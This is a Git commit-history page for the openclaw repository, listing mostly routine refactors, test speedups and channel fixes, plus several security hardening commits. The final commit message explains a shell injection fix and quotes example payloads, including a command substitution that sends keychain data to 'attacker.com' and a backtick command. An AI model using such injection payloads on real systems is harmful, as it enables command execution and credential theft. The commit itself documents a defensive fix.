vultr/openclaw
1
0
Fork 0
mirror of https://github.com/openclaw/openclaw.git synced 2026-04-11 01:01:13 +00:00
Code Issues Packages Projects Releases Wiki Activity
10,083 Commits 1,204 Branches 101 Tags
11822f7b3fb4b90b6a95ea5f4152eaeb3d50ab1b
Commit Graph

5621 Commits

Author SHA1 Message Date
Peter Steinberger
11822f7b3f refactor(tests): centralize vitest mock typing 2026-02-14 19:13:36 +01:00
Peter Steinberger
e03b0ce058 test(tui): cover description layout boundaries 2026-02-14 19:13:36 +01:00
Peter Steinberger
fc4b913d96 refactor(tui): factor description layout widths 2026-02-14 19:13:36 +01:00
Peter Steinberger
f19eabee54 fix(slack): gate DM slash command authorization 2026-02-14 19:10:29 +01:00
Gustavo Madeira Santana
7d4078c704 CLI: fix lazy maintenance command registration (#16374) 
Merged via /review-pr -> /prepare-pr -> /merge-pr.

Prepared head SHA: 29d7cca674
Co-authored-by: gumadeiras <5599352+gumadeiras@users.noreply.github.com>
Co-authored-by: gumadeiras <5599352+gumadeiras@users.noreply.github.com>
Reviewed-by: @gumadeiras
 2026-02-14 13:10:10 -05:00
Shadow
5ba72bd9bf fix: add discord exec approval channel targeting (#16051) (thanks @leonnardo) 2026-02-14 12:05:53 -06:00
Peter Steinberger
4b9cb46c6e refactor(outbound): dedupe poll threading + tighten duration semantics 2026-02-14 19:03:46 +01:00
yinghaosang
8852250192 fix(cli): stop agents command from being unrecognized (#16267) (#16293) 
Merged via /review-pr -> /prepare-pr -> /merge-pr.

Prepared head SHA: d7288f57fa
Co-authored-by: yinghaosang <261132136+yinghaosang@users.noreply.github.com>
Co-authored-by: gumadeiras <5599352+gumadeiras@users.noreply.github.com>
Reviewed-by: @gumadeiras
 2026-02-14 13:01:47 -05:00
Peter Steinberger
f5a4a202e5 perf(test): speed up discord proxy test 2026-02-14 17:56:39 +00:00
Peter Steinberger
240cdd3749 perf(test): speed up cron read ops test 2026-02-14 17:56:39 +00:00
Peter Steinberger
d3483590fb perf(test): stub readability in cf-markdown tests 2026-02-14 17:56:39 +00:00
Peter Steinberger
7582e93a8e perf(test): speed up raw-body reply test 2026-02-14 17:56:39 +00:00
Peter Steinberger
7cc6add9b8 test(web): add SSRF guard cases 2026-02-14 18:53:23 +01:00
Peter Steinberger
cb3290fca3 fix(node-host): enforce system.run rawCommand/argv consistency 2026-02-14 18:53:23 +01:00
Mariano
71f357d949 bluebubbles: harden local media path handling against LFI (#16322) 
* bluebubbles: harden local media path handling

* bluebubbles: remove racy post-open symlink lstat

* fix: bluebubbles mediaLocalRoots docs + typing fix (#16322) (thanks @mbelinky)
 2026-02-14 17:43:44 +00:00
Peter Steinberger
bfa7d21e99 fix(security): harden tlon Urbit requests against SSRF 2026-02-14 18:42:10 +01:00
Robby
5a313c83b7 fix(tui): use available terminal width for session name display (#16109) (#16238) 
Merged via /review-pr -> /prepare-pr -> /merge-pr.

Prepared head SHA: 19c18977e0
Co-authored-by: robbyczgw-cla <239660374+robbyczgw-cla@users.noreply.github.com>
Co-authored-by: steipete <58493+steipete@users.noreply.github.com>
Reviewed-by: @steipete
 2026-02-14 18:39:05 +01:00
Robby
8e5689a84d feat(telegram): add sendPoll support (#16193) (#16209) 
Merged via /review-pr -> /prepare-pr -> /merge-pr.

Prepared head SHA: b58492cfed
Co-authored-by: robbyczgw-cla <239660374+robbyczgw-cla@users.noreply.github.com>
Co-authored-by: steipete <58493+steipete@users.noreply.github.com>
Reviewed-by: @steipete
 2026-02-14 18:34:30 +01:00
Peter Steinberger
fc5d147d1b fix(test-harness): annotate vitest mocks to avoid TS2742 2026-02-14 18:26:46 +01:00
Robby
baa3bf270b fix(webchat): filter NO_REPLY token from streaming and final replies (#16286) 
The webchat channel sent NO_REPLY as visible text to clients instead
of suppressing it. Other channels (Telegram, Discord) already filter
this token via the reply dispatcher, but the webchat streaming path
bypassed this check.

Fixes #16269
 2026-02-14 18:26:19 +01:00
Peter Steinberger
09e2160080 test(browser): add file-chooser traversal regression 2026-02-14 18:20:20 +01:00
Peter Steinberger
571c195c54 fix: support moltbot legacy state dir 2026-02-14 17:14:21 +00:00
Peter Steinberger
dee3abfcd5 refactor(test): share browser control server harness 2026-02-14 17:13:24 +00:00
Peter Steinberger
60898821f7 refactor(test): share telegram create bot harness 2026-02-14 17:13:24 +00:00
Peter Steinberger
ae97f8f798 refactor(test): share doctor e2e harness 2026-02-14 17:13:24 +00:00
Steve
69ba9a0562 fix: add memory search health check to openclaw doctor (openclaw#16294) thanks @superlowburn 
Verified:
- pnpm install --frozen-lockfile
- pnpm build
- pnpm check
- pnpm test (noted unrelated local flakes)

Co-authored-by: superlowburn <24779772+superlowburn@users.noreply.github.com>
Co-authored-by: Tak Hoffman <781889+Takhoffman@users.noreply.github.com>
 2026-02-14 11:09:51 -06:00
Shadow
c16bc71279 fix: add discord routing debug logging (#16202) (thanks @jayleekr) 2026-02-14 11:03:30 -06:00
Peter Steinberger
d714ac7797 refactor(agents): dedupe transient error copy (#16324) 2026-02-14 17:49:25 +01:00
Vincent
478af81706 Return user-facing message if API reuturn 429 API rate limit reached #2202 (#10415) 
* Return user-facing message if API reuturn 429 API rate limit reached

* clarify the error message

* fix(agents): improve 429 user messaging (#10415) (thanks @vincenthsin)

---------

Co-authored-by: Peter Steinberger <steipete@gmail.com>
 2026-02-14 17:40:02 +01:00
Shadow
ff32f43459 Discord: prefer gateway guild id in verbose log 2026-02-14 10:39:36 -06:00
Robby
078642b308 fix(discord): defer component interactions to prevent timeout (#16287) 
* fix(discord): defer component interactions to prevent timeout

Discord requires interaction responses within 3 seconds. Button clicks
were routed through the LLM pipeline before responding, exceeding this
window and showing 'This interaction failed' to users.

Now immediately defers the interaction, then processes the agent
response asynchronously.

Fixes #16262

* fix: harden deferred interaction replies and silent chat finals (#16287) (thanks @robbyczgw-cla)

---------

Co-authored-by: Peter Steinberger <steipete@gmail.com>
 2026-02-14 17:38:01 +01:00
Peter Steinberger
9236a27456 perf(test): speed up web logout tests 2026-02-14 16:36:15 +00:00
Peter Steinberger
fe2d883cf7 perf(test): remove fs skill scanning from skill-commands tests 2026-02-14 16:36:15 +00:00
Peter Steinberger
5349a0f7c2 perf(test): mock reserved commands in skill-commands tests 2026-02-14 16:36:15 +00:00
Peter Steinberger
8ff2787981 perf(test): speed up skill-commands tests 2026-02-14 16:36:15 +00:00
Peter Steinberger
94ff44f112 test: make telegram network config hermetic 2026-02-14 16:36:15 +00:00
Peter Steinberger
ebcc6480c2 perf(cli): split skills formatting 2026-02-14 16:36:15 +00:00
Peter Steinberger
f2c56de955 perf(test): speed up memory suites 2026-02-14 16:36:15 +00:00
Peter Steinberger
a7142c6218 perf(test): cache hook installer fixtures 2026-02-14 16:36:15 +00:00
Peter Steinberger
ee82c173ae perf(test): reduce web logout fs churn 2026-02-14 16:36:15 +00:00
Peter Steinberger
2b5e0a6075 perf(test): speed up memory batch + web logout 2026-02-14 16:36:15 +00:00
Peter Steinberger
76e4e9d176 perf(test): reduce skills + update + memory suite overhead 2026-02-14 16:36:15 +00:00
Peter Steinberger
684c18458a perf(test): speed up line, models list, and memory batch 2026-02-14 16:36:15 +00:00
Peter Steinberger
9fb48f4dff refactor(scripts): make run-node main testable 2026-02-14 16:36:15 +00:00
Peter Steinberger
ebc68861a6 fix: remove unused imports 2026-02-14 17:35:16 +01:00
Peter Steinberger
d3428053d9 fix: redact config values in skills status 2026-02-14 17:35:16 +01:00
Peter Steinberger
b908388245 test(security): remove redundant cli-credentials e2e tests 2026-02-14 17:25:48 +01:00
Peter Steinberger
66d7178f2d fix(security): eliminate shell from Claude CLI keychain refresh 2026-02-14 17:24:29 +01:00
Peter Steinberger
d583782ee3 fix(security): harden discovery routing and TLS pins 2026-02-14 17:18:14 +01:00
Aether AI
9dce3d8bf8 fix(security): prevent shell injection in macOS keychain credential write (#15924) 
Replace execSync with execFileSync in writeClaudeCliKeychainCredentials
to prevent command injection via malicious OAuth token values (OC-28,
CWE-78, Severity: HIGH).

## Vulnerable Code

The previous implementation built a shell command via string
interpolation with single-quote escaping:

  execSync(`security add-generic-password -U -s "..." -a "..." -w '${newValue.replace(/'/g, "'\"'\"'")}'`)

The replace() call only handles literal single quotes, but /bin/sh
still interprets other shell metacharacters inside the resulting
command string.

## Attack Vector

User-controlled OAuth tokens (from a malicious OAuth provider response)
could escape single-quote protection via:
- Command substitution: $(curl attacker.com/exfil?data=$(security ...))
- Backtick expansion: `id > /tmp/pwned`

These payloads bypass the single-quote escaping because $() and
backtick substitution are processed by the shell before the quotes
are evaluated, enabling arbitrary command execution as the gateway
user.

## Fix

execFileSync spawns the security binary directly, passing arguments
as an array that is never shell-interpreted:

  execFileSync("security", ["add-generic-password", "-U", "-s", SERVICE, "-a", ACCOUNT, "-w", newValue])

This eliminates the shell injection vector entirely — no escaping
needed, the OS handles argument boundaries natively.
 2026-02-14 17:06:10 +01:00